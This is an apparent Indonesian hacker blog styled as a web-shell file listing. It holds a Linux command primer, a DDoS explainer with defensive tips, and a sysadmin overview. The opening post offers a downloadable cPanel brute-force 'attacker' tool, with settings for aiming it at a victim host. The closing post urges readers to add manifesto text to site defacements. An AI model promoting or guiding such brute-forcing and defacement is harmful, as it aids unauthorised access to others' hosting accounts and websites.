BL4ZTERZT404
NOT FOUND!
Today : | at : | safemode : OFF| Security : Active
> / blazterzt404 / public_html / blog / post /

Dear sobat blogger blazterzt, blog blazterzt sudah aktif kembali silahkan cekout konten terbaru dari mas blazt.
name author perms com modified label

.:: Software - Cpanel Attacker by Ghost-Dz Unknown rwxr-xr-x 0 2:10 PM

Filename .:: Software - Cpanel Attacker by Ghost-Dz
Permission rwxrw-r--
Author Unknown
Date and Time 2:10 PM
Label
Action

Program ini berguna untuk menyerang Cpanel Hosting
Penggunaan nya mudah. cukup tau sedikit informasi untuk menyerangnya.

Host :  Isikan dengan host korban misal : 183.231.223.12
Port : Port untuk port nya biarkan standar 2082 , jikalau misal port nya ga bsa masuk sesuaikan dengan port hosting.
Timeout : untuk waktu selang penyerangan standar 30 detik.
Attempts : biarkan tetap 19.

Untuk download File ini klik disini :

Download

.:: Linux - Perintah perintah dasar terminal / console Linux BLAZTERROR rwxr-xr-x 1 10:18 AM

Filename .:: Linux - Perintah perintah dasar terminal / console Linux
Permission rwxrw-r--
Author BLAZTERROR
Date and Time 10:18 AM
Label
Action





Yo! Sobat blogger blazterzt, untuk sobat sobat sekalian kali ini mas blazt mau ngeshare tentang pengoperasian Operating System Linux, untuk sobat yang masih awam untuk Linux ini , Seperti halnya bila kita mengetikkan perintah di DOS, command line atau baris perintah Linux juga diketikkan di prompt dan diakhiri enter untuk mengeksekusi perintah tersebut. Baris perintah merupakan cara yang lebih efisien untuk melakukan sesuatu pekerjaan oleh karena itu pemakai Linux tetap menghsobatlkan cara ini untuk bekerja.

Sebaiknya pemula juga harus mengetahui dan sedikitnya pernah menggunanakan perintah baris ini karena suatu saat pengetahuan akan perintah-perintah ini bisa sangat diperlukan.Saya mengumpulkan beberapa perintah dasar yang mungkin kelak akan sering digunakan terutama oleh para pemula. Perhatian: pengetahuan akan perintah-perintah yang lain akan segera bertambah seiring dengan kemajuan sobat menguasai sistem operasi Linux ini. Penjelasan masing-masing perintah akan dipersingkat saja dan untuk mengetahui lebih detail lagi fungsi-fungsi suatu perintah, sobat dapat melihat manualnya, misalnya dengan mengetikkan perintah man:


$ man ls

Manual tersebut akan menampilkan bagaimana cara penggunaan perintah ls itu secara lengkap.

1. Perintah &

Perintah & dipakai dibelakang perintah lain dan menjalankannya di background. Tujuannya adalah untuk membebaskan shell agar bisa dipergunakan menjalankan proses-proses yang lain. Lihat juga perintah bg dan fg.

2. Perintah adduser

Biasanya hanya dilakukan oleh root untuk menambahkan user atau account yg baru. Setelah perintah ini bisa dilanjutkan dengan perintah passwd, yaitu perintah untuk membuat password bagi user tersebut.

# adduser scut
# passwd scut

Selanjutnya sobat akan diminta memasukkan password untuk user udin. Isikan password untuk udin dua kali dengan kata yang sama.

4. Perintah alias

Digunakan untuk memberi nama lain dari sebuah perintah. Misalnya bila sobat ingin perintah ls dapat juga dijalankandengan mengetikkan perintah dir, maka buatlah aliasnya sbb:

$ alias dir=ls

Untuk melihat perintah-perintah apa saja yang mempunyai nama lain saat itu, cukup ketikkan alias. Lihat juga perintah unalias.
 
5. Perintah bg

Untuk memaksa sebuah proses yang dihentikan sementara(suspend) agar berjalan di background. Misalnya sobat sedang menjalankan sebuah perintah di foreground (tanpa diakhiri perintah &) dan suatu saat sobat membutuhkan shell tersebut maka sobat dapat memberhentikan sementara perintah tersebut dengan Ctrl-Z kemudian ketikan perintah bg untuk menjalakannya di background. Dengan cara ini sobat telah membebaskanshell tapi tetap mempertahankan perintah lama berjalan di background. Lihat juga perintah fg.
 
7. Perintah cat

Menampilkan isi dari sebuah file di layar.

$ cat namafile

8. Perintah cd

Change Directory atau untuk berpindah direktori dan saya kira sobat tidak akan menemui kesulitan menggunakan perintah ini karena cara penggunaanya mirip dengan perintah cd di DOS.

9.  Perintah chgrp

Perintah ini digunakan untuk merubah kepemilikan kelompok file atau direktori. Misalnya untuk memberi ijin pada kelompok atau grup agar dapat mengakses suatu file. Sintaks penulisannya adalah sbb:

# chgrp
10. Perintah chmod

Digunakan untuk menambah dan mengurangi ijin pemakai untuk mengakses file atau direktori. sobat dapat menggunakan sistem numeric coding atau sistem letter coding. Ada tiga jenis permission/perijinan yang dapat dirubah yaitu r untuk read, w untuk write dan x untuk execute.

Dengan menggunakan letter coding, sobat dapat merubah permission diatas untuk masing-masing u (user), g (group), o (other) dan a (all) dengan hanya memberi tsobat plus (+) untuk menambah ijin dan tsobat minus (-) untuk mencabut ijin.

Misalnya untuk memberikan ijin baca dan eksekusi file coba1 kepada owner dan group, perintahnya adalah:

$ chmod ug+rx coba1

Untuk mencabut ijin-ijin tersebut:

$ chmod ug-rx coba1

Dengan menggunakan sitem numeric coding, permission untukuser, group dan other ditentukan dengan menggunakan kombinasi angka-angka, 4, 2 dan 1 dimana 4 (read), 2 (write) dan 1 (execute).

Misalnya untuk memberikan ijin baca(4), tulis(2) dan eksekusi(1) file coba2 kepada owner, perintahnya adalah:

$ chmod 700 coba2

Contoh lain, untuk memberi ijin baca(4) dan tulis(2) file coba3 kepada user, baca(4) saja kepada group dan other, perintahnya adalah:

$ chmod 644 coba3

12. Perintah chown

Merubah user ID (owner) sebuah file atau direktori

$ chown


13. Perintah cp

Untuk menyalin file atau copy. Misalnya untuk menyalin file1 menjadi file2:

$ cp


14. Perintah fg

Mengembalikan suatu proses yang dihentikan sementar(suspend) agar berjalan kembali di foreground. Lihat juga perintah bg diatas.

15. Perintah find

Untuk menemukan dimana letak sebuah file. Perintah ini akan mencari file sesuai dengan kriteria yang sobat tentukan. Sintaksnya adalah perintah itu sendiri diikuti dengan nama direktori awal pencarian, kemudian nama file (bisa menggunakan wildcard, metacharacters) dan terakhir menentukan bagaimana hasil pencarian itu akan ditampilkan. Misalnya akan dicari semua file yang berakhiran .doc di current direktori serta tampilkan hasilnya di layar:

$ find . -name *.doc -print
. /public/docs/account.doc
. /public/docs/balance.doc
. /public/docs/statistik/prospek.doc
./public/docs/statistik/presconf.doc


16. Perintah grep

Global regular expresion parse atau grep adalah perintah untuk mencari file-file yang mengandung teks dengan kriteria yang telah sobat tentukan.

$ grep

Misalnya akan dicari file-file yang mengandung teks marginal di current direktori:

$ grep marginal
diferent.doc: Catatan: perkataan marginal luas dipergunakan di dalam ilmu ekonomi
prob.rtf: oleh fungsi hasil marginal dan fungsi biaya marginal jika fungsi
prob.rtf: jika biaya marginal dan hasil marginal diketahui maka biaya total


17. Perintah gzip

Ini adalah software kompresi zip versi GNU, fungsinya untuk mengkompresi sebuah file. Sintaksnya sangat sederhana:

$ gzip

Walaupun demikian sobat bisa memberikan parameter tertentu bila memerlukan kompresi file yang lebih baik, silakan melihat manual page-nya. Lihat juga file tar, unzip dan zip.


18. Perintah halt

Perintah ini hanya bisa dijalankan oleh super user atau sobat harus login sebagai root. Perintah ini untuk memberitahu kernel supaya mematikan sistem atau shutdown.


19. Perintah hostname

Untuk menampilkan host atau domain name sistem dan bisa pula digunakan untuk mengesset nama host sistem.

[flory@localhost docs] $ hostname
localhost.localdomain


20. Perintah kill

Perintah ini akan mengirimkan sinyal ke sebuah proses yang kita tentukan. Tujuannya adalah menghentikan proses.

$ kill

PID adalah nomor proses yang akan di hentikan.


21. Perintah less

Perintah ini sama fungsinya dengan perintah more (melihat isi dari sebuah file) dan hampir sama juga dengan perintah cat.

22. Perintah login

Untuk masuk ke sistem dengan memasukkan login ID atau dapat juga digunakan untuk berpindah dari user satu ke user lainnya.

23. Perintah logout

Perintah yang digunakan apabila kita mau keluar dari sistem

24. Perintah ls

Menampilkan isi dari sebuah direktori seperti perintah dir di DOS. sobat dapat menggunakan beberapa option yang disediakan untuk mengatur tampilannya di layar. Bila sobat menjalankan perintah ini tanpa option maka akan ditampilkan seluruh file nonhidden(file tanpa awalan tsobat titik) secara alfabet dan secara melebar mengisi kolom layar. Option -la artinya menampilkan seluruh file/all termasuk file hidden(file dengan awalan tsobat titik) dengan format panjang.

$ ls

$ ls -al

$ ls -a1



25. Perintah man

Untuk menampilkan manual page atau teks yang menjelaskan secara detail bagaimana cara penggunaan sebuah perintah. Perintah ini berguna sekali bila sewaktu-waktu sobat lupa atau tidak mengetahui fungsi dan cara menggunakan sebuah perintah.

$ man


26. Perintah mesg

Perintah ini digunakan oleh user untuk memberikan ijin user lain menampilkan pesan dilayar terminal. Misalnya mesg sobat dalam posisi y maka user lain bisa menampilkan pesan di layar sobat dengan write atau talk.

$ mesg y atau mesg n

Gunakan mesg n bila sobat tidak ingin diganggu dengan tampilan pesan-pesan dari user lain.


27. Perintah mkdir


Membuat direktori baru, sama dengan perintah md di DOS.

$ mkdir


28. Perintah more

Mempaging halaman, seperti halnya less.


29. Perintah mount

Perintah ini akan me-mount filesystem ke suatu direktori atau mount-point yang telah ditentukan. Hanya superuser yang bisa menjalankan perintah ini. Untuk melihat filesystem apa saja beserta mount-pointnya saat itu, ketikkan perintah mount. Perintah ini dapat sobat pelajari di bab mengenai filesystem. Lihat juga perintah umount.

$ mount
/dev/hda3 on / type ext2 (rw)
none on /proc type proc (rw)
/dev/hda1 on /dos type vfat (rw)
/dev/hda4 on /usr type ext2 (rw)
none on /dev/pts type devpts (rw,mode=0622)


30. Perintah mv

Untuk memindahkan file dari satu lokasi ke lokasi yang lain. Bila argumen yang kedua berupa sebuah direktori maka mv akan memindahkan file ke direktori tersebut. Bila kedua argumen berupa file maka nama file pertama akan menimpa file kedua. Akan terjadi kesalahan bila sobat memasukkan lebih dari dua argumen kecuali argumen terakhir berupa sebuah direktori.

$ mv psybnc /var/tmp

$ mv psybnc

31. Perintah passwd

Digunakan untuk mengganti password. sobat akan selalu diminta mengisikan password lama dan selanjutnya akan diminta mengisikan password baru sebanyak dua kali. Password sedikitnya terdiri dari enam karakter dan sedikitnya mengandung sebuah karakter.

$ passwd


32. Perintah pwd

Menampilkan nama direktori dimana sobat saat itu sedang berada.

33. Perintah rm

Untuk menghapus file dan secara default rm tidak menghapus direktori. Gunakan secara hati-hati perintah ini terutama dengan option -r yang secara rekursif dapat mengapus seluruh file.

$ rm -rf

$ rm -f

$ rm

34. Perintah rmdir


Untuk menghapus direktori kosong.

$ rmdir


35. Perintah shutdown

Perintah ini untuk mematikan sistem, seperti perintah halt. Pada beberapa sistem sobat bisa menghentikan komputer dengan perintah shutdown -h now dan merestart sistem dengan perintah shutdown -r now atau dengan kombinasi tombol Ctr-Alt-Del.

# shutdown -r now


36. Perintah su


Untuk login sementara sebagai user lain. Bila user ID tidak disertakan maka komputer menganggap sobat ingin login sementara sebagai super user atau root. Bila sobat bukan root dan user lain itu memiliki password maka sobat harus memasukkan passwordnya dengan benar. Tapi bila sobat adalah root maka sobat dapat login sebagai user lain tanpa perlu mengetahui password user tersebut.


37. Perintah tail

Menampilkan 10 baris terakhir dari suatu file. Default baris yang ditampilkan adalah 10 tapi sobat bisa menentukan sendiri berapa baris yang ingin ditampilkan:

$ tail

38. Perintah talk

Untuk mengadakan percakapan melalui terminal. Input dari terminal sobat akan disalin di terminal user lain, begitu sebaliknya.

39. Perintah tar

Menyimpan dan mengekstrak file dari media seperti tape drive atau hard disk. File arsip tersebut sering disebut sebagai file tar. Sintaknya sebagai berikut:

$ tar
40. Perintah umount

Adalah kebalikan dari perintah mount, yaitu untuk meng-unmount filesystem dari mount-pointnya. Setelah perintah ini dijalankan direktori yang menjadi mount-point tidak lagi bisa digunakan.

# umount


41. Perintah unalias

Kebalikan dari perintah alias, perintah ini akan membatalkan sebuah alias. Jadi untuk membatalkan alias dir seperti telah dicontohkan diatas, gunakan perintah:

$ unalias dir


42. Perintah unzip

Digunakan untuk mengekstrak atau menguraikan file yang dikompres dengan zip. Sintaknya sederhana dan akan mengekstrak file yang sobat tentukan:

$ unzip

Lihat juga perintah-perintah gzip dan unzip.


43. Perintah wall

Mengirimkan pesan dan menampilkannya di terminal tiap user yang sedang login. Perintah ini berguna bagi superuser atau root untuk memberikan peringatan ke seluruh user, misalnya pemberitahuan bahwa server sesaat lagi akan dimatikan.

# who Dear, everyone..... segera simpan pekerjaan kalian, server akan saya matikan 10 menit lagi.


44. Perintah who

Untuk menampilkan siapa saja yang sedang login. Perintah ini akan menampilkan informasi mengenai login name, jenis terminal, waktu login dan remote hostname untuk setiap user yang saat itu sedang login. Misalnya:

$ who


45. Perintah xhost +

Perintah ini digunakan untuk memberi akses atau menghapus akses(xhost -) host atau user ke sebuah server X.


46. Perintah xset

Perintah ini untuk mengeset beberapa option di X Window seperti bunyi bel, kecepatan mouse, font, parameter screen saver dan sebagainya. Misalnya bunyi bel dan kecepatan mouse dapat sobat set menggunakan perintah ini:

$ xset b

$ xset m


47. Perintah zip

Perintah ini akan membuat dan menambahkan file ke dalam file arsip zip. Lihat juga perintah gzip dan unzip.


Oke Semoga posting ini membantu sobat sekalian, dan juga terus visit blog BL4ZTERZT404 untuk melihat konten konten menariknya.

.:: Learn - Distributed Denial of Services (DDoS) Apa dan Bagaimana ? BLAZTERROR rwxr-xr-x 0 6:53 PM

Filename .:: Learn - Distributed Denial of Services (DDoS) Apa dan Bagaimana ?
Permission rwxrw-r--
Author BLAZTERROR
Date and Time 6:53 PM
Label
Action


Dear Sobat Blogger , dalam posting kali ini mas blazt bakal nerangin apa dan bagaimana sih DDoS itu, DDoS (Distributed Denial of Services) atau yg kerap disebut juga DoS (Denial of Services) adalah teknik penyerangan dimana attacker beserta pasukan zombienya menyerang satu buah server , dengan banyak mengirimkan bandwitch ke server tersebut sehingga jika server tidak dapat menampung bandwitch tersebut maka server akan tumbang, itu sih pengertian sempitnya.

Denial Of Services Umum

Layanan IP dan TCP yang bekerja di mesin sobat adalah termasuk salah satu celah yang memikat untuk melancarkan serangan serangan. Beberapa contoh Denial of Services yang sering dan banyak terjadi adalah:

1. SYN Flooding -- yakni serangan Denial of Services jaringan. Ia mengambil keuntungan dari "loophole" dalam koneksi TCP

2. Pentium "FOOF" bug -- merupakan serangkaian kode assembly yang dikirim ke prosesor asli intel pentium sehingga dapat me-reboot sistem, mempengaruhi kinerja mesin berprosesor pentium. Ia juga tidak tergantung pada sistem operasi yang dijalankan.

3. Ping Flooding -- adalah serangan brute force sederhana. Penyerang mengirimkan "flood" packet ICMP mesin sobat.

4. Ping o death -- serangan ini disebabkan lebih besarnya paket ICMP ECHO REQUEST yang masuk dibandingkan kapasitas yang bisa ditangani struktur data kernel.

5. Teardrop / New tear -- salah satu exploit terbaru yang melibatkan bug yang ada dikode fragmentasi IP pada platform Linux dan Windows.

Informasi selengkapnya mengenai kode eksploitasi dan deskripsi ttg bentuk bentuk dari serangan "tembak menembak tersebut" dapat sobat temukan didalam URL http://www.rootshell.com/ dengan memanfaatkan search engine mereka.

Serangan Denial Of Services Jaringan

Jaringan jaringan termasuk salah satu servis yang rawan terhadap aksi denial of services. seringkali seseorang berusaha mengganggu atau menghalang halangi user user untuk memanfaatkan akses jaringan. Tiga tipe umum serangan denial of services jaringan adalah: service overloading, message flooding, dan signal grounding. Sedangkan tipe keempat adalah clogging meski tidak setenar seperti yang tiga bentuk serangan tersebut.


Service Overloading:

Hal ini terjadi manakala membanjirnya request request network yang dibuat untuk server daemon dan sebuah single computer. request request ini dapat dibuat dengan berbagai macam cara, biasanya disengaja. Hasil dari interupsi interupsi paket paket jaringan yang tidak dapat diproses sesuai waktu normal. Beberapa request akan dibuang karena tak tersedia lagi ruang antrian. Apabila ini berupa servis berbasis TCP, mereka akan dikirim ulang untuk di-load.

sobat dapat menggunakan program program monitor jaringan untuk mencegah tipe serangan ini. JIka sobat memilikidaftar mesin mesin dan low-level network address (misal: ethernet board level address bukan IP address), ini akan sangat membantu untuk menelusuri sumber masalah yang ada dijaringan sobat, dan juga akan membantu menemukan masalah. Jika sobat login ke firewall atau router sobat, sobat dapat secara cepat untuk memeriksa apakah serangan datang dari luar atau dari dalam jaringan sobat. Langkah yang lain yang dapat sobat tempuh adalah mempersiapkan lebih dini menangani serangan, jika sobat memiliki anggaran, belilah program "network monitor" dan penyadap subnet sehingga dapat mengontrol kelancaran traffic jaringan.


Message Flooding:

Hal ini terjadi manakala seorang user memperlambat proses sebuah sistem dalam jaringan untuk mem-block sistem atas beban kerja normal. Sering "memberondong/menembak" mesin melalui pesan pesan yang dialamatkan kepadanya. Kasus ini dapat berupa request request untuk layanan file atau login, atau juga request request echo-back sederhana.

Dalam kasus yang besar, aksi flood dapat menyebabkan mesin menjadi crash disertai error error, atau kehabisan memori untuk menangani paket paket yang masuk. Serangan ini otomatis akan mematikan akses bagi sebuah server jaringan.

Sebuah server yang terkena flood tidak dapat merespon request request dalam waktu tertentu. Maka selama tenggang waktu ini penyerang memiliki kesempatan untuk menulis sebuah program yang mampu menjawab request request jaringan dalam server tersebut. Sebagai contoh, seorang penyerang melakukan flood ke sebuah NIS server dan kemudian memberikan balasan balsan untuk request request NIS tersebut - khususnya, request request untuk password password.

Mesin yang digunakan penyerang dapat memberi respon request request, menyamar sebagai server asli dan mensuplai informasi palsu, seperti record record tanpa password. Pada kondisi normal mesin server yang asli sesungguhnya akan menolak paket ini, namun karena mesin server yang asli tidak menerima paket, ia tidak dapat memberikan respons. Oleh sebab itu client dari workstation akan percaya bahwa respon yang ia terima adalah benar, dan penyerang akhirnya mencapai login sistem.


Signal Grounding:

Metode metode fisik juga dapat digunakan untuk menutup network. Menghadang signal dalam kabel jaringan, memasukkan signal signal lain, atau mencabut terminator ethernet dapat menggagalkan client client melakukan transmisi atau menrima pesan pesan. Tipe serangan ini dapat digunakan tidak hanya untuk menutup akses ke beragam mesin yang menginduk pada server, tapi juga menyembunyikan usaha usaha break-in pada mesin mesin yang melaporkan bad login ke mesin mesin master melalui gejala gejala jaringan yang tidak normal; yang bisa saja berupa break-in tersembunyi dalam sebuah mesin individual. Usaha yang untuk mengurangi penyerangan jalur belakang ini adalah memproteksi kabel kabel jaringan dari sabotase fisik.


Clogging:

Implementasi protokol protokol TCP/IP pada kebanyakan versi UNIX sesungguhnya memungkinkan mereka untuk disalahgunakan dengan beragam cara. Untuk membunuh servis, salah satu cara adalah menggunakan batasan terhadap sebagian koneksi koneksi yang terbuka. Pada kasus clogging, analogi berpikirnya apa yang terjadi manakala telepon sobat berdering. sobat menjawab dengan "hallo..." tetapi tak seorangpun merespons (bukan hantu :-)) sobat mungkin akan menunggu beberapa saat lalu menyapa "halllooo..." kembali. Dan sobat melakukan satu sampei tiga kali sehingga sobat hilang kesabaran lalu menutupnya. Pada saat sobat menunggu seseorang untuk menjawab sapaaan "haloo.." dari sobat, tak seorangpun ada diseberang sana. Koneksi telepon sobat sibuk dan tidak memproses panggilan panggilan yang masuk lainnya. Hanya sedikit yang dapat sobat lakukan untuk kasus seperti ini. Firewall-firewall secara umum tidak dapat menangani masalah ini.


Tips dan cara penanggulangan serangan DoS


1. Lakukan pencegahan serangan DoS dengan menutup servis servis/protokol protokol yang dianggap tidak perlu melalui firewall

2. Non aktifkan IP directed broadcast untuk subnetwork subnetwork dalam domain sobat guna mencegah serangan ini.

Untuk informasi selengkapnya tentang IP directed broadcast dan hubungannya dengan serangan Denial of Srvice silahkan kunjungi:

AusCERT Alert AL-98.01 - multiscan (mscan) tool
ftp://ftp.auscert.org.au/pub/auscert/advisory/AL-98.01.mscan

CERT/CC advisory CA-1998-001 -smurf IP Denial-of-service Attacks
http://www.cert.org/advisories/CA-1998-001.sscan

AusCERT Alert AL-1999.001 - "sscan" scanning tools
ftp://ftp.auscert.org.au/pub/auscert/advisory/AL-1999.001.sscan

RFC2644/BCP34 - mengubah default untuk directed broadcast dlm router
http://rfc.net/rfc2644.html

UNIX IP stack Tuning Guide v2.7 (Rob Thomas)
http://www.cymru.com/~robt/Docs/Articles/ip-stacking-tuning.html

3. Gunakan filter filter paket HANYA mengizinkan paket paket dengan IP address yang sah yang melewati jaringan. Untuk informasi ini tentang filter anti spoofing silahkan lihat di:

CERT/CC Advisory CA-1998-01 - Smurf Denial of Service Attacks
http://www.cert.org/advisories/CA-1998-01.html

RFC2827/BCP38 - Network Ingress Filtering
http://rfc.net/rfc2827.html

4. Ketahui lebih dini tentang bentuk serangan Denial of Service yang beredar, juga serangan berbasis tool tool yang didistribusikan para intruder, Silahkan kunjungi:

Results of the Distribution-Systems Intruder Tools Workshop
http://www.cert.org/reports/dsit_workshop-final.html

Nah bagaimana penerangan tentang DDoS ini ? semoga posting mas blazt kali ini dapat bermanfaat buat sobat sekalian, dan juga terus kunjungi blog mas blazt untuk terus membaca konten konten menarik blog mas Blazt ini

.:: Linux - Penerangan sederhana System Administrasi Linux BLAZTERROR rwxr-xr-x 0 6:42 PM

Filename .:: Linux - Penerangan sederhana System Administrasi Linux
Permission rwxrw-r--
Author BLAZTERROR
Date and Time 6:42 PM
Label
Action


Dear sobat blogger blazterzt , semuanya pasti sudah taukan apa itu System Operasi Linux , yah linux ada system operasi yang di Opensource kan penerangan sempit nya sih gitu tapi taukah sobat system administrasi dalam linux ? dan Apa itu Administrasi Sistem Linux ?
Sebuah sistem komputer tidak akan dapat bekerja dengan baik jika salah satu dari ketiga komponen ini dihilangkan: hardware, software, brainware. Hardware adalah bagian komputer yang ada secara fisik. Software adalah kode-kode instruksi yang dijalankan pada hardware yang bersangkutan. Sedangkan brainware adalah manusia yang bertugas untuk mengoperasikan sistem komputer. Administrasi sistem adalah aspek yang berkaitan erat pada faktor brainware tersebut.Seorang sysadmin bertugas untuk menjaga agar sebuah sistem dapat tetap berjalan sesuai dengan fungsinya. Jika ada masalah pada sistem tersebut, dia berkewajiban untuk memperbaikinya. Setiap sistem komputer membutuhkan sysadmin, mulai dari komputer pribadi sampai ke mainframe berukuran besar. Semuanya tetap membutuhkan sysadmin. Jika sobat adalah satu-satunya pengguna di komputer sobat, sobat adalah sysadmin bagi komputer sobat sendiri. sobat semua adalah seorang sysadmin mungkin tanpa kesadaran sobat sendiri.

Linux memiliki beragam fasilitas untuk mengotomatisasi seluruh kegiatannya. Hal ini tentunya sangat memudahkan seorang administrator. Administrator tidak perlu melakukan pekerjaan yang berulang-ulang secara manual, pekerjaan yang demikian dapat diserahkan kepada sistem Linux. Dengan perintah yang tepat, sistem akan dapat melakukan tugasnya tanpa perlu diperintah ulang.

Konsep User dan Permission
Linux adalah sistem operasi multiuser. Artinya, sebuah sistem Linux dapat dipakai oleh lebih dari satu orang sekaligus. Seorang pengguna Linux memiliki sebuah direktori pribadi (home directory) untuk menyimpan file-filenya. Umumnya ia tidak diperkenankan untuk memodifikasi isi direktori selain home directory-nya. Pada kebanyakan sistem Linux, home directory user abc biasanya diletakkan di /home/abc. Pada Linux, setiap file dimiliki oleh seorang user dan sebuah group. Hak akses baca, tulis, dan execute untuk user dan group juga dapat dibatasi. Hal ini akan mempermudah administrasi sistem karena user tidak akan dapat mengubah konfigurasi sistem seenaknya, berbeda dengan sistem operasi yang tidak didesain sebagai sistem operasi multiuser seperti halnya Windows.Pada Linux (dan sistem UNIX lainnya) ada sebuah account yang memiliki hak mutlak pada sistem tersebut, account tersebut secara tradisional disebut 'root'. Account ini bisa melakukan apa saja pada Linux tanpa mempedulikan hak akses. Account ini umumnya hanya digunakan untuk keperluan administrasi, dan tidak digunakan untuk keperluan sehari-hari. Mengapa account root tidak baik digunakan untuk keperluan sehari-hari? Program pada sebuah sistem operasi (Linux ataupun bukan Linux) mungkin memiliki bug atau kesalahan pemrograman.

Dengan menjalankan program sebagai root, bug tersebut memiliki kemungkinan untuk dapat merusak seluruh sistem. Sedangkan jika program tersebut tidak dijalankan sebagai root, maka kerusakan hanya akan terjadi pada file milik user yang bersangkutan. Selain itu manusia adalah makhluk yang suka melakukan kesalahan, dengan account root, kesalahan tersebut akan dapat merusak sistem, sedangkan jika dilakukan oleh user biasa, kesalahan tersebut hanya akan berakibat fatal pada file yang dimiliki oleh user yang bersangkutan. Itulah sebabnya mengapa virus software hampir tidak pernah menjangkiti Linux, karena para penggunanya hanya menggunakan account 'root' untuk hal-hal yang benar-benar memerlukan 'root'. Sebaliknya, pada sistem operasi single user seperti DOS, Windows atau MacOS, setiap user adalah 'root', dapat sobat bayangkan kekacauan yang terjadi pada masa itu jika sistem operasi tersebut digunakan oleh beberapa orang.

Struktur Direktori dari Linux
Sebuah filesystem pada Linux dibagi menjadi banyak direktori. Hal ini akan memudahkan sysadmin karena file yang sobat cari akan berada di dalam direktori sesuai dengan fungsi dan kegunaannya.Berikut ini adalah beberapa lokasi direktori yang penting untuk diketahui oleh seorang sysadmin:

/bin: berisi program yang esensial, yang berguna jika partisi /usr tidak terhubungkan
/boot: berisi file-file yang penting untuk booting Linux, seperti halnya kernel Linux
/usr: berisi file-file program dan data yang diperlukan untuk menjalankan program yang
bersangkutan, file di dalam hirarki ini dapat dibuat menjadi read-only
/var: berisi file-file yang dinamik seperti email, file log dan sebagainya.
/etc: berisi file konfigurasi dari program
/mnt: berisi mount point dari partisi lainnya di sistem komputer sobat, pada Linux Mandrake
misalnya, /mnt/DOS_hda1 adalah isi drive C: pada sistem operasi DOS/Windows
/dev: berisi device, seperti /dev/ttyS0 adalah port serial pada komputer sobat, atau /dev/fd0
adalah floppy disk.
/home: berisi home direktori dari user pada sistem sobat
/sbin: berisi program-program yang esensial untuk sysadmin
/root: adalah home directory dari user 'root', tidak disimpan di bawah direktori /home
karena kemungkinan direktori tersebut belum di-mount.

Memonitor Keadaan Sistem
Seorang administrator sistem harus mengetahui apa saja yang sedang terjadi pada sistem sobat. Hal-hal yang umum untuk diketahui adalah:Proses apa saja yang sedang berjalan pada saat tersebut, dan juga detilnya seperti pemilik proses, pemakaian CPU, pemakaian memori dan sebagainya. Untuk mendapatkan informasi ini, seorang sysadmin dapat menggunakan perintah ps, pstree, gtop atau ktop. Siapa saja yang sedang login pada saat itu. Informasi ini dapat didapat dari perintah who. Siapa saja yang memasuki sistem beberapa waktu terakhir. Dapat dilihat dari perintah last Melihat keadaan ruang harddisk. Dapat dilihat dari output perintah df. Melihat kapan user tertentu terakhir login. Dapat dilihat dari perintah finger atau last.

Memonitor File-file Log
Linux memiliki mekanisme untuk mencatat kejadian-kejadian penting. Kejadian-kejadian tersebut dicatat ke file-file log tertentu. Pada kebanyakan distribusi Linux, biasanya file log disimpan di dalam direktori /var/log atau /var/adm. Fasilitas pencatatan tidak menulis kejadian pada sebuah file, tapi ke beberapa file sesuai dengan kategorinya. Sebagai contoh pada distribusi RedHat atau Mandrake terdapat file-file di bawah ini:

/var/log/cron, mencatat semua kegiatan cron (utilitas untuk menjalankan program secara periodik)
/var/log/httpd/*, mencatat akses ke web server
/var/log/maillog, mencatat segala hal yang berhubungan dengan email
/var/log/messages, mencatat segala hal yang tidak termasuk pada file log lainnya.
/var/log/news/*, mencatat segala hal yang berhubungan dengan news server
/var/log/samba/*, mencatat hal-hal yang berhubungan dengan file server samba
/var/log/secure, mencatat hal-hal yang berhubungan dengan keamanan sistem
/var/log/spooler, mencatat hal-hal yang berhubungan dengan pencetakan
/var/log/xferlog, mencatat transfer file melalui FTP.
File-file yang penulis sebutkan di atas adalah file teks biasa, dan dapat dilihat dengan menggunakan utilitas teks biasa, misalnya gunakan perintah tail -f /var/log/messages untuk melihat perkembangan pada sistem sobat.

Memperbaiki Keamanan Sistem
Mungkin tugas yang paling berat dari seorang sysadmin, terutama yang bertanggung jawab untuk sistem yang terhubungkan pada Internet adalah masalah keamanan sistem. Untuk ini seorang sysadmin dituntut untuk memiliki kesadaran lebih tinggi dalam masalah keamanan. Sistem operasi Linux berkembang dengan kecepatan yang sangat tinggi, berbeda dengan sistem operasi lain yang closed source. Terkadang, hanya beberapa menit setelah masalah keamanan ditemukan, sudah dibuatkan patch-nya. Supaya seorang sysadmin mendapat informasi secepat mungkin, ia harus secara periodik mencek tatus keamanan dari vendor Linux yang dia gunakan.

Berikut adalah halaman security dari beberapa vendor Linux:
RedHat Linux, http://www.redhat.com/support/updates.html
Linux Mandrake, ttp://www.linux-mandrake.com/en/security.php3
Caldera OpenLinux, http://support.calderasystems.com/
Debian GNU/Linux, http://www.debian.org/security/
SuSE Linux, http://www.suse.de/security/index.html
LinuxPPC, http://www.linuxppc.com/security/
YellowDog, http://www.yellowdoglinux.com/resources/errata.shtml


Utilitas Interaktif untuk Administrasi Sistem Beberapa distribusi Linux menyertakan utilitas untuk mempermudah konfigurasi sistem. Utilitas ini sangat mempermudah bagi sobat yang cuma ingin memakai Linux, dan tidak punya banyak waktu untuk melakukan konfigurasi. Berikut adalah daftar utilitas tersebut untuk beberapa distribusi terkemuka.


RedHat Linux: linuxconf
Linux Mandrake: linuxconf atau drakxconf
SuSE Linux: yast
Caldera OpenLinux: coas atau lisa


Utilitas tersebut berguna bagi sobat yang baru memakai Linux atau yang tidak punya banyak waktu. Namun bagi sobat yang ingin melakukan kustomisasi terhadap sistem, mungkin akan lebih berguna jika sobat langsung mengedit file konfigurasi dari program yang sobat kustomisasi.Sebuah sistem komputer, tetap membutuhkan perhatian dari manusia supaya dapat berjalan dengan baik. Mungkin sistem tersebut tetap dapat berjalan tanpa harus mendapatkan perhatian penuh dari manusia, namun jika terjadi masalah pada sistem tersebut, peranan manusia tetap diperlukan. Manusia yang bertugas untuk menangani hal ini disebut administrator sistem atau system administrator, disingkat menjadi sysadmin atau admin saja. Dalam artikel ini akan dibahas mengenai administrator sistem dan tugas-tugas apa saja yang harus dilakukannya.

.:: IT News - Hacker Manifesto v.1 BLAZTERROR rwxr-xr-x 0 6:20 PM

Filename .:: IT News - Hacker Manifesto v.1
Permission rwxrw-r--
Author BLAZTERROR
Date and Time 6:20 PM
Label
Action


Dear Sobat Blogger buat kalian yang ingin menambahkan kata kata hacker pada deface'anya silahkan pakai kata-kata hacking manifesto ini , pasti bakal keren dah , lebih mantep deface nya

